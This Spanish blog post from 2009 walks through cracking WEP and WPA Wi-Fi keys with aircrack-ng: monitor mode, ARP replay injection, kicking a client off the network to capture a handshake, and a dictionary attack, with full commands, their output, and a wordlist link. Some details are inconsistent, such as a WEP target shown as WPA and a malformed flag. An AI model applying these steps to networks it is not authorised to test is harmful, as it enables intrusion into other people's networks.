Demo Blog

Potterpig

Wireless Hacking Wep - Wpa

by Andrés Morantes on Nov.22, 2009, under

Se que este ataque es algo viejo, pero lo posteo debido a que muchas veces me han preguntado sobre este tema y siempre les paso un manual que hice algun tiempo, asi pues, pienso que es mejor que quede en mi blog.

Bueno lo primero que tienen que hacer repito, es instalar Linux, estos ataques siempre son mas efectivos en las plataformas *NIX gracias a que los drivers ya hacen parte del kernel (en la mayoría de las ocasiones), además que les recomiendo Linux porque ya trae una cantidad de herramientas listicas para que uno las pruebe.

Otra cosa es saber escoger una buena wireless, yo personalmente les recomiendo las Ralink viejitas, ya que tienen mejor soporte en Linux. Otra un poco mas carita pero que en realidad es la mejor de todas son las Atheros, se van acordar de mi … ya que estas las usan muchos auditores de seguridad, incluso pueden buscar las D-link que ya vienen con este chipset, las D-link viejitas también son buenas, estas traen chipset Ralink. Por otro lado están las wireless de Windows la verdad algunas son buenas otras no mucho aunque hoy en día si corren con suerte Linux ya tendrá soporte, estas son las famosas Broadcom y algunas Intel que son las que vienen con los portatiles de HP y Compaq … así que prueben primero de la siguiente forma:

spiderpig:~# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

eth1      no wireless extensions.

wlan0     RT73 WLAN  ESSID:"SPIDERPIG"
          Mode:Managed  Frequency=2.437 GHz  Access Point: 00:1B:11:D4:54:63
          Bit Rate=54 Mb/s
          RTS thr:off   Fragment thr:off
          Encryption key: xxxxxxxxx
          Link Quality=91/100  Signal level:-34 dBm  Noise level:-79 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0


Fíjense que mi PC tiene 3 interfaces, la eth0 la eth1 y la wlan0. Mi tarjeta wireless en este caso seria la wlan0 que tiene chipset RT73, no siempre tendrá el mismo nombre de las interfaces por eso es que deben empezar por acá, asegúrense primero el nombre sus interfaces, de acá en adelante mi tarjeta wireless será wlan0. Si aparece después de este comando  significa que Linux la detecto, ahora la otra prueba de oro es saber si puedo pasarla a modo Monitor, recuerden que este modo es como el modo promiscuo solo que la wireless detecta las redes que tiene a su alcance. Para saber si esta en modo monitor se ejecuta el siguiente comando:

spiderpig:~# iwconfig wlan0 mode monitor

Ahora se probara que este en modo monitor, para esto ejecutamos de nuevo iwconfig:

spiderpig:~# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

eth1      no wireless extensions.

wlan0     RT73 WLAN  ESSID:""
          Mode:Monitor  Frequency=2.437 GHz  Bit Rate=48 Mb/s
          RTS thr:off   Fragment thr:off
          Encryption key:off
          Link Quality=89/100  Signal level:-32 dBm  Noise level:-115 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0


nota> si arroja algún error al pasarlo a modo monitor, se deberán bajar los driver directamente desde la pagina de aircrack y compilarlo.


Fíjense que ya cambio el modo, esto da luz verde a empezar a hacer el ataque.

Ahora se ejecutará el sniffing para detectar redes cercanas y usuarios asociados (“usuarios que estén conectados a algún Access Point”).

spiderpig:~# airodump-ng wlan0

Al lanzar este comando verán algo parecido a esto, podrán ver que en la parte izquierda donde dice CH empezara variar, eso significa que la wireless esta cambiando los canales para detectar redes. Esto mas que todo detecta redes de mayor potencia, se podría poner a escuchar redes en un solo canal, así que no es nada raro que encuentren mas redes al ponerlo a escuchar en un solo canal.

CH  5 ][ Elapsed: 56 s ][ 2008-06-08 14:02

BSSID                                   PWR  Beacons    #Data, #/s    CH  MB  ENC  CIPHER AUTH ESSID

00:0F:3D:FA:20:EE  100        2                0      0                 1   11  OPN              Telebucaramanga
00:0F:3D:FA:59:7F  104        18               0       0                 1     11   OPN              Telebucaramanga
00:16:B6:31:04:B9  100         4                 0       0                 6     48. WPA  TKIP   PSK  eparrar
00:1B:11:09:7F:30  100         10               0                     6    54.  WEP  WEP         TGI-03
00:17:3F:F2:59:A4   98          3                 0                     11   48   OPN              belkin54g
00:1B:11:D4:54:63   82         15                86                  6   54   WEP  WEP   SPIDERPIG
00:00:00:00:00:00   -1            0                 28                  8   -1   OPN             

BSSID                                 STATION          PWR   Rate  Lost  Packets  Probes

00:1B:11:D4:54:63        00:0E:35:8C:1C:1D   83  54- 0     0        5
00:00:00:00:00:00         00:02:2D:28:71:FB  101   0-11     0       28
(not associated)          00:1D:D9:2C:EF:DF  104   0- 1     0        5UNEIntercable,YOYI,Telebucaramanga

El atacante ve que SPIDERPIG tiene encriptación WEP y que además esta enviando datos y actualmente esta en el canal 6. Así que se pone el airodump a escuchar nada más a ese Access Point de la siguiente forma:

spiderpig:~# airodump-ng -c6 --bssid 00:1B:11:D4:54:63 -w spider wlan0
-w spider significa que va a crear un archivo que se llama spider, esto servirá después para poder descifrar la llave. Por lo general el crea 2 archivos uno spider-01.txt y un spider-01.cap. El txt se crea por comodidad, para poder ver las tramas creadas en un archivos de texto incluso para poder crear tramas ARP falsas cuando no tengamos usuarios asociados, los ataques son mas efectivos con alguien asociado pero podemos entrar al access point a las malas como quien dice y obligar al access point a que de información de los IVS que son las cabeceras de las tramas, ahí es donde se encuentra las llaves de acceso, el .cap son los tipos de archivos que se crean como captura de trafico, algo parecido a los archivos que crea el wireshark.


CH  6 ][ Elapsed: 40 s ][ 2008-06-08 19:46

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:1B:11:D4:54:63   81  98      327     1033   89   6  54  WPA  TKIP   PSK  SPIDERPIG

BSSID              STATION            PWR   Rate  Lost  Packets  Probes

00:1B:11:D4:54:63  00:0E:35:8C:1C:1D   78  36-54    39     1012
Ahora el truco es la inyección de tráfico ARP al Access Point, la idea de este ataque es obligar al Access Point a que de información de su tabla ARP para que el atacante recoja información sobre las IVS. Entonces en otra ventana y sin dejar de ejecutar el airodump se ejecutar este otro comando:


spiderpig:~# aireplay-ng -3 -b 00:1B:11:D4:54:63  -h 00:0E:35:8C:1C:1D -x 1024 wlan0

El -3 significa un ataque de inyección de ARP el –b es la MAC del Access Point el –h es la MAC del cliente que esta asociado al Access Point el –x son la cantidad de paquetes por segundo que se le enviara al access point.

spiderpig:~# aireplay-ng -3 -b 00:1B:11:D4:54:63  -h 00:0E:35:8C:1C:1D -x 1024 wlan0
The interface MAC (00:1B:11:20:D2:27) doesn't match the specified MAC (-h).
        ifconfig wlan0 hw ether 00:0E:35:8C:1C:1D
20:37:07  Waiting for beacon frame (BSSID: 00:1B:11:D4:54:63) on channel 6
Saving ARP requests in replay_arp-0608-203707.cap
You should also start airodump-ng to capture replies.
Read 82899 packets (got 145 ARP requests and 0 ACKs), sent 727522 packets...(1024 pps)?

Se sabrá que el ataque ha empezado cuando sent xxxx packets haya empezado a subir, también podremos ver que la cantidad de IVS enviados ha aumentado, esto podría tomarse como la forma de aumentar los IVS( “los IVS son los mismos que se muestra en la pantalla de airodump en la parte de #Data”)


CH  6 ][ Elapsed: 18 mins ][ 2008-06-08 20:55

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:1B:11:D4:54:63   81  48     8472    7003  117   6  54  WEP  WEP         SPIDERPIG

BSSID              STATION            PWR   Rate  Lost  Packets  Probes

00:1B:11:D4:54:63  00:0E:35:8C:1C:1D  116  48-54    31   107446

Si se fijan los paquetes han aumentado de 1033 a 7003 considerablemente.

Ahora por ultimo pondremos a descifrar la clave, esta es la parte más fácil y maravillosa, porque es automática. Por lo general el aircrack necesita como mínimo tomar 5000 IVS, si no son suficientes el le dirá que aumente los IVS a 10000 así consecutivamente de 5000 en 5000. Lo bueno de esto es que después de ejecutar este comando y al salir este error el continuara su trabajo cuando ud ya tenga los 10000 IVS.


Así que podrá ejecutar este comando al momento de ejecutar el ataque de ARP, mientras tanto podrá ir a ver la novela para que no se pierda ningún momento o a ver una película o salir, el hará todo el trabajo por ud. Según nuestras pruebas mínimo eran 25000 IVS yo alguna vez alcance a necesitar 35000 IVS y hasta 40000IVS eso por la lejanía del Access Point, y claro después de 2 horas obtuve la clave, pero eso sí de que es fijo tener la clave es fijo, y alégrense cuando salga el mensaje de KEY FOUND!







HACKING WPA

En WPA la única forma de poder hacker es con diccionario, pues si quieren intentar pues acá le tengo la formula, el secreto de este ataque es tener un buen diccionario.
Para esto usaremos una inyeccion agresiva deautenticando a un usuario para obtener un handshake, asi que empezaremos usando el airodump como lo había usado antes

spiderpig:~# airodump-ng -c6 --bssid 00:1B:11:D4:54:63 -w spider wlan0


Luego en otra ventana ejecuntan esto:

spiderpig:~/hackwifi# aireplay-ng -0 5 -a 00:1B:11:D4:54:63  -c 00:0E:35:8C:1C:1D -wlan0

Esto hace que deatentiquen a un usuario para poder escucharlo y obtener algunas tramas, y poder pasar al ataque de diccionario. El -0 siginifica deutenticacion y seguido se le manda la cantidad de deautenticaciones que quiere enviar, con 5 son suficientes.

Después de esto se debe ejecutar el wpa de la siguiente forma:

spiderpig:~/hackwifi# aircrack-ng -a 2 -0 -w /media/win2/Andres/dictionaries/word/word.lst spider.cap

-a siginifica modo de ataque seguido de 2 que significa WPA/WPA2 – PSK –w siginifica la dirección del diccionario,  pueden intentar en esta pagina, estan organizados por idioma, http://wifi0wn.wordpress.com/wepwpawpa2-cracking-dictionary/

Opening spider-01.cap
Read 308 packets.

   #  BSSID              ESSID                     Encryption

   1  00:1B:11:D4:54:63  SPIDERPIG                 WPA (1 handshake)
   2  00:16:B6:31:04:B9  eparrar                   WPA (0 handshake)
  
Index number of target network ?

Al ver que obtenga un handshake como en este caso el de SPIDERPIG solo queda escoger esta red, osea oprimimos 1 y damos ENTER. Aircrack tratara de descifrar la clave con el diccionario, la verdad no se cuanto se demore esto,lo cierto es que hay que tener algo de paciencia.


0 comentarios more...

0 comentarios

Publicar un comentario

Con la tecnología de Blogger.

Looking for something?

Use the form below to search the site:

Still not finding what you're looking for? Drop a comment on a post or contact us so we can take care of it!